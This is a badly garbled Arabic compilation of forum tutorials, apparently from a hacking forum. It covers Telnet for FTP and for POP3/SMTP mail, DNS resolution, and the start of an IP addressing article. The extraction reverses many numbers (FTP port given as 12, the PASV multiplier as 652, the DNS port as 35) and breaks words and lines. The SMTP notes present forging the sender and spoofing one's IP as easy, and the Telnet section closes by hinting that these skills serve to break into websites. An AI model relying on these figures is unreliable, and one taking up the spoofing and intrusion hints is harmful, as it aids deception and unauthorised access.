‪                       :‬‬ ‫إذھب الى القائمة ‪ === Terminal‬ثم اختر منھا ==== ‪ Preferences‬ثم نقوم‬ ‫بتفعیل‪                                                                              ‬‬ ‫( وضع علمة الصح ) على كل من ‪ VT ­ 100/ANSI‬و ‪ Echo Local‬و ‪     Block‬‬ ‫‪                                        831‬‬ ‫‪                                                                             Cursor‬‬ ‫والن ‪ Telnet‬جاھز للعمل ‪                                                       .....‬‬


‫‪                      ........... FTP‬‬ ‫‪.‬‬ ‫استخدام ال ‪ Telnet‬كبروتوكول نقل الملفات‬ ‫من القائمة ‪ Connect‬اختر ‪ Remote System‬ثم اكتب في ال ‪ Host Name‬م‬ ‫اسم‬ ‫الموقع‪                                                                              ‬‬ ‫ع‬ ‫المراد التشبیك علیه مثال ذلك ‪                                                    ::‬‬ ‫‪                                                                    FTP.Yahoo.com‬‬ ‫‪               ..........‬‬ ‫‪.‬‬ ‫واكتب كذلك البورت وغالبا ما يستخدم ال ‪ FTP‬بورت ‪12‬‬ ‫عندما يتم نجاح التصال سیطلب منك ادخال اسم المستخدم ‪ User‬و‪          ‬‬ ‫الباسوورد ‪ Pass‬قم بإدخالھما اذاا‪                                                    ‬‬ ‫ن‪ ‬‬ ‫كنت تعرفھ ما أو ادخل بواسطة ( المستخدم المجھول ) ‪ Anonymouns‬اذا كان‬ ‫الخدمة‪                                                             ‬‬ ‫ة‬ ‫الموقع يدعم ھذه‬ ‫ومثال ذلك ‪ .....‬عندما يطلب منك ادخال اسم المستخدم اكتب ما يلي ‪       ::‬‬ ‫‪                                                                  User Anonymouns‬‬ ‫بريدك‪ ‬‬ ‫ك‬ ‫ثم أدخل كلمة السر وفي ھذه الحالة ( المستخدم المجھول ) اكتب له‬ ‫بريدك‪                                                 ‬‬ ‫ك‬ ‫أو أي بريد إذا لم تشأ بإدخال‬ ‫الشخصي ومثال ھذا ‪                                                               ::‬‬ ‫‪                                                                   Pass @ your mail‬‬ ‫الذي‪     ‬‬ ‫بعد ذلك يظھ ر لك ما يدل على أنه تم التصال والدخول الى الكمبیوتر ي‬ ‫تتصل به وغالبا ما تكون الرسالة كالتالي ‪                                         ::‬‬ ‫‪                                                     032 Logged in anonymously‬‬ ‫يتم‪    ‬‬ ‫والن يجب أن تعمل ما يشبه صیغة اتصال بینك وبین الموقع وذك حتى م‬ ‫‪                                     ..........‬‬ ‫‪.‬‬ ‫إرسال واستقبال الملفات من خللھا‬ ‫ويتم ذلك باستخدام المر ‪ , PASV‬وعند ارسالك لھذا المر سیرد علیك السیرفر‬ ‫ر‬ ‫برقم‪                                                                   ‬‬ ‫م‬ ‫الذي تتصل به‬ ‫ي‪   ‬‬ ‫مؤلف من ستة خانات وھي تشمل ال ‪ IP‬الخاص به و المنفذ المفتوح الذي‬ ‫سوف تستخدمه للشبك على الموقع ‪                                            ..‬‬ ‫مثال ما يرسله لك السیرفر ‪                                                         ::‬‬ ‫‪                                                         722 Mode Entring Passive‬‬ ‫‪                                                               84,41,96,56,981,802‬‬ ‫؟؟؟؟؟؟‪                                         ‬‬ ‫؟‬ ‫ولكن ما تفسیر الستة خانات ھذه‬ ‫‪                                          931‬‬ ‫تفسیر ذلك كالتالي ‪                                                            ::‬‬ ‫للموقع‪     ‬‬ ‫ع‬ ‫الربع خانات الولى( من الیسار الى الیمین ) ھي رقم الي بي ‪IP‬‬ ‫بواسطته‪                                                  ‬‬ ‫ه‬ ‫والذي سوف نشبك‬ ‫ي‪                                                           :‬‬ ‫على الموقع ‪.....‬وھ ‪:‬‬ ‫‪                                                                 96,56,981,802‬‬ ‫واما الخانتین الخیرتین فھما لحساب رقم البورت الذي سوف نستخدمه لنشاءء‬ ‫التصال بالموقع ‪                                                                ,,‬‬ ‫وطريقة حسابه كالتالي ‪                                                        ::‬‬ ‫ب‪   ‬‬ ‫نضرب الرقم الذي ھو قبل الخیر ( ‪ ) 41‬ب ‪ , 652‬ثم نجمع إلى حاصل الضرب‬ ‫الرقم الخیر وھو ( ‪                                                          ) 84‬‬ ‫والناتج ھو رقم البورت المطلوب ‪ ,‬والعملیة تتم كالتالي ‪                      ::‬‬ ‫‪                                              41 * 652 = 8453+84 = 2363‬‬ ‫‪                                             ..............‬‬ ‫‪.‬‬ ‫فرقم البورت ھو ‪2363‬‬ ‫تحلیل العملیة الحسابیة ‪                                                      ::‬‬ ‫ر‪    ‬‬ ‫قد تتساءل ھنا لماذا ضربنا الرقم ب ( ‪ ) 652‬والجواب أنه عندما يعین سیرفر‬ ‫للوصول‪                                                          ‬‬ ‫ل‬ ‫الموقع بورت ما‬ ‫للتشبیك من خلله فإنه يرسله لنا بعد أن يحوله الى النظام السداسي عشر (‬ ‫ة‪                                                    ‬‬ ‫‪ ( Hex‬فیقوم بعملیة قسمة‬ ‫ي‪   ‬‬ ‫رقم البورت على ‪ ) 61 * 61 ( .... 652‬وناتج القسمة ھو الرقم الول والباقي‬ ‫ھو الرقم الخیر والمثال كما ترى ‪                                            ::‬‬


‫‪ ( 2363‬رقم البورت ) ‪ ( 41 = 652 /‬الرقم الول ) والباقي من القسمة ‪    ( 84‬‬ ‫الرقم الخیر ) ‪                                                                   ..‬‬ ‫ھذا كل ما في المر ‪                                                            ..‬‬ ‫ح‪ ‬‬ ‫والن بعد أن عرفنا الي بي ‪ IP‬والبورت الذي سنشبك من خللھما ‪ ,‬نقوم بفتح‬ ‫ونشبك‪                                                              ‬‬ ‫ك‬ ‫نافذة جديدة‬ ‫على الموقع ولیكن مثل ‪                                                       ::‬‬ ‫‪                                                                FTP.Yahoo.com‬‬ ‫‪                                                          2363‬‬ ‫‪2‬‬ ‫ونضع البورت وھو‬ ‫أو‪    ‬‬ ‫والن أنت في الموقع ويمكنك إدخال البیانات التي تريدھا أو سحب مجلد و‬ ‫‪                                                                  .............‬‬ ‫‪.‬‬ ‫ملف‬ ‫‪                                    041‬‬ ‫التصفح‪         ‬‬ ‫ح‬ ‫ولكن انتبه الى أن ( المستخدم الجھ ول ) صلحیته محدودة في‬ ‫‪                                                                        ...........‬‬ ‫بعض الوامر التي تلزمك لعرض وتصفح المجلدات ‪                              ::‬‬ ‫‪ ls‬لعرض جمیع المجلدات والملفات والدلة الموجودة في المكان الحالي ‪      ...‬‬ ‫س‪                                           ‬‬ ‫يشبه ھذا المر المر ( ‪ (dir‬في الدوس‬ ‫ف‪                                                          ‬‬ ‫‪ del‬لحذف مجلد أو ملف‬ ‫ت‪                                              ‬‬ ‫‪ list‬لستعراض الملفات والمجلدات‬ ‫ع‪                                            ‬‬ ‫‪ syst‬لمعرفة نوع السیرفر في الموقع‬ ‫‪ abor‬للغاء أي عملیة تقوم بھا‪                                                  ‬‬ ‫ر‪                                ‬‬ ‫‪ renfr‬و ‪ rento‬لنقل مجلد أو ملف من مكان لخر‬ ‫‪ rest‬لكمال عملیة تم إيقافھا‪                                                   ‬‬ ‫ة‪                                                             ‬‬ ‫‪ help‬لطلب مساعدة‬ ‫‪ pwd‬لخبارك ماھ و المجلد الي انت متواجد فیه الن ‪                           .‬‬ ‫د‪                                                          ‬‬ ‫‪ mkd‬لنشاء مجلد جديد‬ ‫ر‪    ‬‬ ‫‪ man‬وھو اختصار لـ (‪ (Manual‬ويتیح لك مشاھدة الخیارات المتاحة لكل امر‬ ‫المتاحة‪                                                ‬‬ ‫ة‬ ‫مثل لمشاھدة الخیارات‬ ‫‪                                                             man ls‬‬ ‫‪m‬‬ ‫للمر ‪ ls‬نكتب‬ ‫المور‪       ‬‬ ‫ر‬ ‫والن سأتكلم عن تصفح اليمیل باستخدام التلنت واوضح لك بعض‬ ‫‪                                                       ...‬‬ ‫الغامضة عن ھذه الداة ‪.‬‬ ‫د‪     ‬‬ ‫ھناك الكثیر من المواقع على الشبكة تقدم خدمة ‪ Telnet‬وھذه المواقع قد‬ ‫تعود ملكیتھا الى شركات خاصة او الى جھ ات حكومیة ‪ ,‬وتتنوع محتوياتھاا‪       ‬‬ ‫ومجالت خدماتاھا واذكر من ھذه الخدمات على سبیل المثال ‪                ::‬‬ ‫‪O‬‬ ‫‪Official Data‬‬ ‫التقارير الذكیة ( ‪ ( Reports Technical‬وقواعد البیانات الرسمیة (‬ ‫‪ , ( Bases‬وفھ ارس الكتب ( مثل مكتبة الكونغرس المريكیة ) وكذلك موقع وكالة‬ ‫ة‬ ‫‪ Nasa‬الذي يحتوي على ابحاث وتقارير عن علم الفضاء ‪                      ....‬‬ ‫اشتراكا‪     ‬‬ ‫ا‬ ‫وكذلك ھ ناك العديد من الخدمات والمواقع ‪ ,‬وقد يتطلب استخدامھا‬ ‫مثل‪ ‬‬ ‫بھ ذه المواقع ‪ ,‬وقد توجد مواقع لعامة الزوار ولكن مع بعض التحفظات على ل‬ ‫‪                                     .....‬‬ ‫‪.‬‬ ‫ھذا النوع من الولوج واستخدام الموقع‬ ‫متممة‪         ‬‬ ‫ة‬ ‫وأود ان أذكر ھ نا اتماما للمقالة السابقة بعض البرامج التي تعتبر‬ ‫‪                                       141‬‬ ‫للحصول على خدمة ‪ Telnet‬ومنھا ‪                                              :‬‬ ‫‪ -1‬برنامج ‪ Ewan‬وھو خاص بنظام ويندوزز‪                                          ‬‬ ‫ش‪                                     ‬‬ ‫‪ -2‬برنامج ‪ Ncsa‬وھو خاص بأنظمة ماكنتوش‬ ‫وھذان البرنامجان ھما الكثر انتشارا لسھولة التعامل معھما ‪                 ..‬‬ ‫الستفادة من ال ‪ Telnet‬في تصفح البريد اللكتروني ‪                        :‬‬ ‫البريد اللكتروني الذي يقدم خدمة ‪ Telnet‬يعتمد عادة على مزودين ‪        :‬‬ ‫‪                                      52‬‬ ‫‪ -1‬مزود ارسال ‪ SMTP‬ويستخدم البورت ‪5‬‬ ‫‪                                    011‬‬ ‫‪0‬‬ ‫‪ -2‬مزود استقبال ‪ POP‬ويستخدم البورت‬ ‫ت‪    ‬‬ ‫فإذا أرت ان تتصفح بريدك في ‪ Yahoo‬عن طريق ال ‪ Telnet‬فنفذ الخطوات‬


‫التالیة ‪                                                                           ::‬‬ ‫اكتب في ‪ Run‬من ‪ Start‬ما يلي ‪                                                :‬‬ ‫‪                                               POP.Mail.Yahoo.com 110 Telnet‬‬ ‫‪                                   ....‬‬ ‫طبعا على فرض انه لك حساب في الیاھو ‪.‬‬ ‫المستخدم‪   ‬‬ ‫م‬ ‫بعد ذلك ستظھ ر لك رسالة ترحیبیة ثم يطلب منك ادخال اسم‬ ‫فاكتب له كما يلي ‪                                                              ::‬‬ ‫‪                                                            ( your name ) User‬‬ ‫ثم اضغط ‪ ..... Enter‬بعد ذلك سیطلب منك ادخال كلمة المرور قم بكتابتھا ‪ :‬‬ ‫‪                                                                       (­­­ ) Pass‬‬ ‫‪                                                              ..... Enter‬‬ ‫‪.‬‬ ‫ثم اضغط‬ ‫‪ ...‬‬ ‫وھ نا اذا كان الدخال صحیحا فسوف ينقلك الى صندوق البريد الخاص بك ‪.‬‬ ‫السابق‪    ‬‬ ‫ق‬ ‫يمكنك استخدام أوامر التلنت لتصفح بريدك وقد ذكرت في المقال‬ ‫معظمھا وأذكر منھا ‪                                                             ::‬‬ ‫ل‪                                                       ‬‬ ‫‪ List -1‬لستعراض الرسائل‬ ‫‪ Dele -2‬لحذف احدى الرسائل بعد تعیینھا‪                                        ‬‬ ‫‪ Retr -3‬لستقبال احدى الرسائل بعد تعیینھا‪                                    ‬‬ ‫‪ Mail From -4‬لرسال رسالة وتحديد المرسل لھا ( بعد كتابة ھذا المر يظھر‬ ‫لك عبارة‪ Sender ok:‬بعدھا اكتب المرسل الیه ‪                          ))......‬‬ ‫‪ Rcpt To -5‬لتحديد المرسل الیه ( وبعد كتابة ھذا المر يظھر لك عبارة ‪     :‬‬ ‫‪ Recipiant ok‬بعدھا أعطه أمر ‪ Data‬ثم اكتب الرسالة التي تريد ‪         ......‬‬ ‫ملحظات ‪                                                                        ::‬‬ ‫‪ -1‬البروتوكول ‪ Smtp‬المعتمد في ارسال الرسائل ليتطلب أي توثیق ‪ ,‬وھذاا‪  ‬‬ ‫‪                                         241‬‬ ‫أي‪   ‬‬ ‫يعني انه بإمكانك تزيیف الرسائل التي تريد ارسالھا بسھولة وذلك بكتابة ي‬ ‫ر‪ ‬‬ ‫اسم ( للمرسل ) بعد أمر ‪ Mail From‬ويمكنك أيضا تزوير ال ‪ IP‬الخاص وھو أمر‬ ‫‪                                                            .....‬‬ ‫‪.‬‬ ‫في غاية السھولة‬ ‫ر‪   ‬‬ ‫‪ -2‬ال ‪ Telnet‬للسف ل يحتوي خاصیة تشفیر البیانات ‪ ,‬فإذا كتبت كلمة سر‬ ‫ان‪  ‬‬ ‫مثل فستظھر كما كتبتھا دون أي تورية لھا او تشفیر ‪ ....‬وھذه نقطة يجب ن‬ ‫‪                                                                       ...‬‬ ‫تنتبه لھا ‪.‬‬ ‫ة‪   ‬‬ ‫‪ -3‬في التثبیت الفتراضي لويندوز ‪ 0002‬قد تكون خدمة ال ‪ Telnet‬غیر مثبتة‬ ‫‪      Telnet Server Admin‬‬ ‫‪T‬‬ ‫لذلك فأنت بحاجة لتثبیتھ ا يدويا وذلك بتثبیت الداة‬ ‫الداة‪   ‬‬ ‫ة‬ ‫والتي تمكنك من ايقاف وتشغیل ھذه الخدمة في جھازك ‪ ,‬ولفتح ھذه‬ ‫اضغط على ‪ Telnet Administration‬في ‪ ) Administrative‬أدوات إدارية ) ‪   ....‬‬ ‫بعض خیارات ھذه الداة ‪                                                         ::‬‬ ‫‪ service Start the‬لتشغیل التلنت ‪                                         ......‬‬ ‫‪ Stop the service‬ليقاف التلنت ‪                                           .......‬‬ ‫‪ current user List the‬يظھ ر المستخدمین المتصلین بخدمة التلنت ‪         ....‬‬ ‫أشیاء‪      ‬‬ ‫ء‬ ‫وأخیرا اذا كنت قد قرأت ھ ذين المقالین بشكل متقن فبإمكانك عمل‬ ‫المواقع‪ ‬‬ ‫ع‬ ‫كثیرة بواسطة ھ ذه الداة ( لمحت الى كثیر منھ ا ) لسیما في اختراق‬ ‫‪ ( ....‬أنواع منھا طبعا ) ‪ ....‬وھ ذا ل يحتاج منك ال الى التجربة والمتابعة ‪ ...‬ولبد‬ ‫د‬ ‫‪                                       ......‬‬ ‫‪.‬‬ ‫أنك في النھاية ستصل الى ما تريد‬ ‫حتى‪       ‬‬ ‫ولكن انتبه فھ ذه المور يجب ان تمارس بعناية فائقة بعد خبرة جیدة ى‬ ‫ليسبب لك أي ضرر ‪                                                              ..‬‬ ‫‪                                      341‬‬ ‫‪                               DNS‬‬ ‫‪D‬‬ ‫ماھو‬ ‫‪                                                     BURN_EG ACID‬‬ ‫‪B‬‬ ‫للكاتب‪:‬‬ ‫السلم علیكم و رحمه االله و بركاته ‪                                          ::‬‬ ‫تعالى‪ ‬‬ ‫ى‬ ‫ايش الخبار يا اصدقاء و زوار المنتدى اتمنى تكونو كلكو بخیر ان شاء االله‬ ‫االله‪ ‬‬ ‫ه‬ ‫و طبعا كما وعدتكم بعد العوده الحمد الله بالمواضیع القويه و المؤثره ان شاء‬ ‫و لكن قبل ان نبدأ دعونا نعقد اتفاق معا ‪                                    ::‬‬


‫بمعنى‪    ‬‬ ‫ى‬ ‫فلننسا كلمه ھ كر و لنبدأ فى تعلم الشیاء التى توصلنا لكلمه ھكر‬ ‫‪.....‬الخ‪         ‬‬ ‫خ‬ ‫الكلمه و طبعا الھكر لیس معنا تروجن ھورسس او سب سفن‬ ‫لغات‪   ‬‬ ‫الھكر الحقیقى ھ و تعلم نظم التشغیل مثل اللینكس و الیونكس و تعلم ت‬ ‫ى‪    ‬‬ ‫تصمیم المواقع بجانب بعض لغات البرمجه التى يكون اھمھا فى مجالنا ھى‬ ‫لغه السى ‪                                                                C‬‬ ‫المفید‪                   :‬‬ ‫‪:‬‬ ‫و الن دعونا من كل ھذه الخلبیط و لنبدأ التكلم فى‬ ‫ل‪      ‬‬ ‫نحن فى بعض الحیان نسمع عن اشیاء كثیره و لكن ل نعرف ما ھى و ل‬ ‫شئ‪     ‬‬ ‫نحاول ان نكتشف و نعرف ما ھى و فى ھذا الملف سوف نتكلم عن ئ‬ ‫يعرف‪                                       ‬‬ ‫ف‬ ‫نسمع عنه كثیرا و لكن معظمنا ل‬ ‫ما ھو ‪                                                                     ::‬‬ ‫‪                                                     :DNS‬‬ ‫‪:‬‬ ‫و ھذا الشئ ھو ال‬ ‫و سوف نبدأ بالتحدث عن ھ ذا السم الذى يسمعه الكثیرين و لكن ل يعرفون ماا‬ ‫ھو ‪                                                                        ::‬‬ ‫نفسه‪                                                        ‬‬ ‫ه‬ ‫و لنبدأ بالسؤال‬ ‫===========================================‬ ‫=======‪                                                                ‬‬ ‫==============‪                                                     ‬‬ ‫‪                                                              ?DNS‬‬ ‫?‬ ‫ما ھو ال‬ ‫==============‪                                                     ‬‬ ‫‪ DNS‬‬ ‫‪D‬‬ ‫اول ‪ DNS :‬ھو اختصار لكلمه ‪ . Domain Name System‬و يتصل سرفر ال‬ ‫عادتا على بورت ‪ 35‬مما يعنى انك اذا اردت التصال الى احد المواقع و‪         ‬‬ ‫ل‪                                         ‬‬ ‫استعملت ال ‪ DNS‬حقه فسوف تتصل‬ ‫‪                                     441‬‬ ‫‪  translates alphabetical‬‬ ‫‪t‬‬ ‫به عن طريق البورت ‪ 35‬و سوف يترجم او يحول ال‬ ‫‪            IP‬‬ ‫‪ hostnames‬و يعنى اسم الموقع مثل ‪ WWW.BURN.COM :‬الى ‪I‬‬ ‫ه‪               ‬‬ ‫‪ ADRESSES‬مثل ‪ 1.0.0.721‬و العكس صحیح و عندما تتم العملیه‬ ‫‪                                                      ):‬‬ ‫تتصل بالموقع مباشره )‬ ‫ن‪  ‬‬ ‫و عملیه التحويل ھذه تسمى ‪ address resolution‬اى تحويل او تحلیل عنوان‬ ‫ه‪                                  ‬‬ ‫الموقع الى ‪ IP‬او العكس لنستطیع التصال به‬ ‫د‪  ‬‬ ‫و قبل ظھور ال ‪ DNS‬كان اسم اخر لعملیه ال ‪. address resolution‬و لكن قد‬ ‫ن‪     ‬‬ ‫ظھر ال ‪ DNS‬لجعل توزيع الھوستس اسھ ل بكثیر من الماضى حیث انه من‬ ‫من‪    ‬‬ ‫السھ ل ان تتذكر اسم موقع معین تريده افضل من ان تتذكر اربعه خانات ن‬ ‫‪                                                                . (IP‬‬ ‫الرقام ( ‪.‬‬ ‫و كان السم المستعمل ل ال ‪ address resolution‬قبل ال ‪ DNS‬كان يتكون من‬ ‫ن‬ ‫ملف اسمه ال ‪ HOST FILE‬و كان عباره عن اسماء الھوستس اى المواقع و‪    ‬‬ ‫‪S‬‬ ‫‪Stanford Research‬‬ ‫عنواوين ال ‪ IP‬الخاصه بھم و كان ھذا الملف تتولى رعايته‬ ‫‪ .(Institute's Network Information Center (SRI­NIC‬و كان على ھذاا‪        ‬‬ ‫ن‪  ‬‬ ‫الراعى ان يجدد ( ‪ (UPDATE‬الجدول ھذا حوالى كل اسبوع و يمده بالعنواوين‬ ‫ملفه‪ ‬‬ ‫ه‬ ‫الجديده و الرقام التى ظھ رت و على السیستم ادمین ان يجدد ھو الخر‬ ‫‪                    .SRI­NIC‬‬ ‫‪.‬‬ ‫او عن طريق اتصال ال ‪ FTP‬بینه و بین الراعى اى‬ ‫بدأو‪     ‬‬ ‫و طبعا مع تطور النترنت الرھیب و السريع بدأ ھذا النظام فى الفشل و و‬ ‫بى‪        ‬‬ ‫يبحثون عن النظام المثل الذى يستطیع التحكم فى الھوست و الى ى‬ ‫معا فى وقت واحد و بسرعه و بترتب و دقه و طبعا ظھر ال ‪ DNS‬لیفعل ذلك‪   ..‬‬ ‫و ال ‪ DNS‬لیس له مركز اى ‪ decentralized‬اى انه لیس ھناك ماكینه اوو‪         ‬‬ ‫سیستم معین يتحكم فى كل ال ‪ DNS‬بل بالعكس فال ‪ DNS‬عباره عن داتا بیز‬ ‫ز‬ ‫‪     DNS‬‬ ‫‪D‬‬ ‫موزعه بشكل منظم و توجد على كذا سرفر مختلف و كل سرفر علیه‬ ‫معین‪    .‬‬ ‫‪.‬‬ ‫يعرف اين يبحث عندما يريد ان يحصل على معلومه معینه او ھوست‬ ‫ھذا بالنسبه لمعلومات عامه عن ال ‪ DNS‬و كیف كان النظام قبل اكتشافه و‪   ‬‬ ‫ھى ايضا نظره عامه عن حركه النترنت القديمه ‪                               ..‬‬ ‫‪                                                          :THE DNS SERVER‬‬


‫================‪                                                  ‬‬ ‫او‪       ‬‬ ‫ال ‪ DNS SERVER‬ھو عباره عن كمبیوتر و يعمل عادتا على نظام ‪ UNIX‬و‬ ‫‪   Berkeley‬‬ ‫‪B‬‬ ‫النظم الشبیھ ه بالیونكس و يستخدم برنامج الیونكس ‪ BIND‬اى (‬ ‫ش‪ ‬‬ ‫‪ .(Internet Name Domain‬و يوجد ايضا برامج مثل ھذه للويندوز و الماكنتوش‬ ‫ايضا‪                                                                         ‬‬ ‫ا‬ ‫‪          . UNIX‬‬ ‫‪.‬‬ ‫اذا اراد احد استعمالھم ك ‪ DNS SERVER‬و لكن الكل يفضل ال‬ ‫‪                                      541‬‬ ‫و يتكون برنامج ال ‪ DNS‬من جزئین ‪                                          :‬‬ ‫‪ (the name server itself (the daemon program that listens to port 35‬و‪  ‬‬ ‫‪                                                   RESOLVER‬‬ ‫‪R‬‬ ‫الخر يسمى‬ ‫ه‪  ‬‬ ‫و ال ‪ NAME SERVER‬ھذا يستجیب الى متصفحك عندما تطلب معلومه معینه‬ ‫مثل‪      ‬‬ ‫فمثل عندما تفتح النترنت اكسبلورر و تكتب او تطلب منه موقه معین ل‬ ‫د‪     ‬‬ ‫‪ WWW.BURN.COM‬فسیسئل المتصفح اقرب ‪ DNS‬موجود له (و ھذا يعتمد‬ ‫على اتصالك بالشبكه و رقم الى بى الخاص بك) عن عنوان ال ‪ IP‬ل‪            ‬‬ ‫‪                                                         WWW.BURN.COM‬‬ ‫لن المتصفح يحتاج ھذا ال ‪ IP‬لیجد السرفر الذى لديه ھذا الھوست اى ھذاا‪    ‬‬ ‫متصفحك‪          .‬‬ ‫‪.‬‬ ‫الموقع و يطلب محتويات الموقع من السرفر لیعرضھا لك فى‬ ‫ك‪ ‬‬ ‫و قبل ھذا سیسئل ال ‪ daemon program‬فى جداوله اى فى ذاكره متصفحك‬ ‫تتم‪    ‬‬ ‫عن الموقع الذى تطلبه فأذا لم يجده ينتقل الى ما سبق شرحه و ھكذا م‬ ‫العملیه‪                                                                  ):.‬‬ ‫)‬ ‫‪                                                :THE TREE INFORMATION‬‬ ‫======================‪                                       ‬‬ ‫و الن اصدقائى بعد ان اتقفنا على انك عندما تطلب رقم ‪ IP‬معین من المتصفح‬ ‫ح‬ ‫‪      DNS‬‬ ‫‪D‬‬ ‫حقك و ل يجده فى ال ‪ DNS‬المحلى اى الخاص بك سوف يسأل ال‬ ‫ى‪      ‬‬ ‫‪  SERVER‬العلى منه فى المستوى عنه لیجده و اذا لم يجده فى مستوى‬ ‫اعلى فینتقل للبحث فى مستوى اعلى و اعلى و ھ كذا يسیر البحث من القل‬ ‫ل‬ ‫‪                                .DNS SERVERS‬‬ ‫‪.‬‬ ‫الى العلى فى مستويات ال‬ ‫لكن‪    ‬‬ ‫و طبعا نتیجه من ھ ذا التصال فنستنتج وجود شجره اتصال و معلومات و ن‬ ‫بالضبط‪                                                          ‬‬ ‫ط‬ ‫كیف تعمل‬ ‫دعونا نأخذ مثال ‪                                                           ::‬‬ ‫ك‪    ‬‬ ‫لو فرضنا ان ال ‪ ISP‬الخاص بك كان مثل ‪ isp.co.uk‬و ھذا يعتمد على اتصالك‬ ‫بالنترنت اى حسب الشركه و السرفر الذى تشبك علیه فمن الطبیعى طبعا ان‬ ‫ن‬ ‫ن‪         ‬‬ ‫يكون ال ‪ server's hostname ISP's DNS‬مثل ھذا ‪ dns.isp.co.uk‬و الن‬ ‫فالنفرض انك سألت ھذا ال ‪ DNS‬لیبحث لك عن ‪ IP‬الخاص ب‪                  ‬‬ ‫ه‪   ‬‬ ‫‪ WWW.BURN.COM‬مثل فسیقوم ھذا ال ‪ dns.isp.co.uk‬بالبحث فى جداوله‬ ‫قلنا‪   ‬‬ ‫المحلیه المخذنه فى الذاكره عنده فیجدھا و اذا لم يجدھا فسینتقل كما ا‬ ‫ى‪    ‬‬ ‫الى مستوى اعلى من ال ‪ DNS SERVER‬لیبحث فیه و اذا لم يجده ايضا فى‬ ‫من‪              ‬‬ ‫المستوى العلى فعلیه ان يقوم بتغییر مكان البحث كلیا فمثل ن‬ ‫‪            school.edu.uk‬‬ ‫‪s‬‬ ‫‪ dns.isp.co.uk‬الى ‪ some­organization.org.uk‬او ‪,‬‬ ‫‪ university.ac.uk, england.gov.uk, airforce.mil.uk‬و الخ و ھناك امثله كثیراا‪ ‬‬ ‫‪                                      641‬‬ ‫ه‪ ‬‬ ‫طبعا ‪ ):‬و كل شئ ينتھى ب ‪ UK‬و اذا لم يجده ايضا فى كل الماكن المتاح له‬ ‫البحث فیھا فسیرجع المتصفح الى اكبر ‪ DNS‬موجود على الشبكه و اسمه ال‬ ‫ل‬ ‫‪ ROOT‬فھو يحتوى على كل عناوين ال ‪ IP‬على كل للمواقع الموجوده على اى‬ ‫ى‬ ‫‪                                                       .DOMAIN NAME‬‬ ‫‪                                ?or fail "hang" When and why does DNS‬‬ ‫==============================‪                       ‬‬ ‫و يمكن ايضا لل ‪ DNS‬ان يكون بطئ او سريع ‪.‬اذا كان ال ‪ ISP‬الخاص بك يحنوى‬ ‫ى‬ ‫على ال ‪ IP‬الذى طلبته فسوف يحتاج فقط الى اجزاء من الثانیه لیأتى به لك و‬ ‫ال‪ ‬‬ ‫يعرضه فى متصفحك‪ .‬اما اذا انتقل المتصفح للبحث فى مستوى اعلى من ل‬


‫‪ DNS‬فسوف يحتاج الى قلیل من الوقت يمتد حتى ‪ 51‬ثانیه ‪ .‬و فى حاله انه ل‬ ‫يجده سوف تأتیك رساله من متصفحك تقول ‪ address could not be found‬و‪ ‬‬ ‫ھذا يحدث نتیجه اعطاء المتصفح ‪ HOST‬او ‪ IP‬خطأ لیبحث عنه و بالتالى طبعاا‪ ‬‬ ‫متصفحك‪   ‬‬ ‫ك‬ ‫فھ و لیس موجود من الساس لیعرضه او نتیجه طول البحث فیقوم‬ ‫‪                          . TIMED OUT‬‬ ‫‪.‬‬ ‫بقدان التصال مع ال ‪ DNS‬اى عملیه‬ ‫و فى ھذه الحاله نضغط فى المتصفح على ‪ REFRESH‬او‪ RELOAD‬طبعا حسب‬ ‫ب‬ ‫متصفحك‪                                                              .‬‬ ‫‪.‬‬ ‫‪                                    741‬‬ ‫‪                                  IP‬‬ ‫ماھو ‪I‬‬ ‫القطان‪                                                         ‬‬ ‫ن‬ ‫للكاتب‪:‬محمد‬ ‫‪                                                             ...‬‬ ‫السلم علیكم ‪.‬‬ ‫تكلمنا في المنتدى كثیرا حول بروتوكول ‪ TCP/IP‬وذلك في عدة مواضیع نشرھا‬ ‫‪                                                           ...‬‬ ‫الخ عبد الحفیظ ‪.‬‬ ‫‪                                       IP‬‬ ‫والن سوف نشرح مفھوم عناوين الـ ‪I‬‬ ‫بقیة‪  ‬‬ ‫ھذا عبارة عن جزء من بحث كتبته لحدى المجلت العربیة وسوف نكمل ة‬ ‫الكلم عن ‪ TCP/IP‬في مواضیع قادمة ان شاء االله ‪                           ...‬‬ ‫ید‪                                                                        ‬‬ ‫تمھ د‬ ‫ی يعرف باسم عنوان ‪.IP‬كما يجب‬ ‫ب‬ ‫كل محطة ‪ TCP/IP‬يجب أن تحمل رق ً‬ ‫م منطق ً‬ ‫اا‪                                ‬‬ ‫ا‬ ‫ا‪      ‬‬ ‫ض أن تكون عناوين ‪ IP‬وحیدة لكل محطة أو شبكة مستخدمة لبروتوكول‬ ‫أي ً‬ ‫‪ TCP/IP‬من أجل التصال‪                                                     ..‬‬ ‫ي ر‪    ‬‬ ‫ُع ّف عنوان ‪ IP‬مكان توضع المحطة ضمن الشبكة بنفس الطريقة التي يتم‬ ‫لتحقیق‪  ‬‬ ‫ق‬ ‫التعريف بھ ا عن عنوان منزل داخل مدينة ما باستخدام اسم الشارع‪.‬‬ ‫ن وحید ً وذو بنیة‬ ‫ة‬ ‫ذلك‪ ،‬يجب أن تمتلك كل محطة من محطات الكرة الرضیة عنوا ً‬ ‫اا‪         ‬‬ ‫ا‬ ‫متماثلة‪                                                                      .‬‬ ‫‪.‬‬ ‫ل‪  ‬‬ ‫يسمح عنوان ‪ IP‬بالدللة على رقم الشبكة ‪ Network ID‬ورقم المحطة داخل‬ ‫ة‪  ‬‬ ‫الشبكة ‪ .Host ID‬يدل رقم الشبكة على النظام المتوضع على نفس الشبكة‬ ‫أن‪ ‬‬ ‫الفیزيائیة‪ .‬يجب على جمیع المحطات المتوضعة على شبكة فیزيائیة واحدة ن‬ ‫تمتلك نفس رقم الشبكة‪ .‬كما يجب أن يكون رقم الشبكة وحید ً بین أرقام بقیة‬ ‫ة‬ ‫اا‪                ‬‬ ‫الشبكات‪                                                                     .‬‬ ‫‪.‬‬ ‫ي‪ ‬‬ ‫أما رقم المحطة ‪ Host ID‬فیع ّف محطة عمل أو مخدم أو مسیر ‪ Router‬أو أي‬ ‫رر‪                                                 ‬‬ ‫اا‪      ‬‬ ‫جھاز يستخدم بروتوكولت ‪ .TCP/IP‬يجب أن يكون عنوان كل محطة وحید ً‪      ‬‬ ‫للشبكة‪                                                             .‬‬ ‫‪.‬‬ ‫بالنسبة‬ ‫المحطة‪                                                    ‬‬ ‫ة‬ ‫رقم الشبكة ورقم‬ ‫ة‪  ‬‬ ‫يحوي عنوان ‪ IP‬على ‪ 23‬بت ويتألف من أربعة حقول ذات ثمانیة بتات مفصولة‬ ‫ه‪   